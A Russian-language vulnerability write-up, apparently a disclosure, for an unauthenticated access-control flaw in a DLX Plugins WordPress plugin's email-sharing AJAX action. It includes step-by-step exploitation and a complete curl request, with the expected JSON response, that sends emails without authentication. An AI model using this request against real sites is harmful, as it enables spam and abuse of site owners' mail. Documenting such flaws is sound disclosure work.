
writeups for (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)
Разборы уязвимостей (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)
-------------- CVE-2025-67586 Эксплойт PoC --------------
==> Описание Уязвимость нарушенного контроля доступа существует в плагине WordPress, разработанном DLX Plugins. Плагин предоставляет неаутентифицированное AJAX-действие, которое позволяет злоумышленникам злоупотреблять функциональностью «Поделиться по email» без надлежащих проверок разрешений.
Неаутентифицированный злоумышленник может повторно использовать действующий одноразовый токен записи (post nonce) для запуска запросов на отправку email, что приводит к несанкционированной отправке писем (спам / злоупотребление) без аутентификации пользователя.
==> Требуемые привилегии Нет (неаутентифицированный)
==> Подтверждение концепции (PoC)
Шаг 1: Выберите веб-сайт с установленным плагином
Шаг 2: Получите действующий одноразовый токен (nonce)
Шаг 3: Эксплойт через неаутентифицированный запрос
bash команда: (замените URL веб-сайта, URL записи и nonce)
curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]='
-d 'formData[toEmail]=[email protected]'
-d 'formData[subject]=PoC'
-d 'formData[shareText]=POC test'
-d 'formData[emailShareType]=selection'
--compressed
--> Ожидаемый JSON-ответ:
{ "success": true, "data": { "errors": false, "message_title": "Этот пост был отправлен!", "message_body": "Вы отправили этот пост на [email protected]", "message_subject": "[Отправленный пост] <НАЗВАНИЕ ЗАПИСИ>", "message_source_name": "Имя сайта", "message_source_email": "[email protected]" } }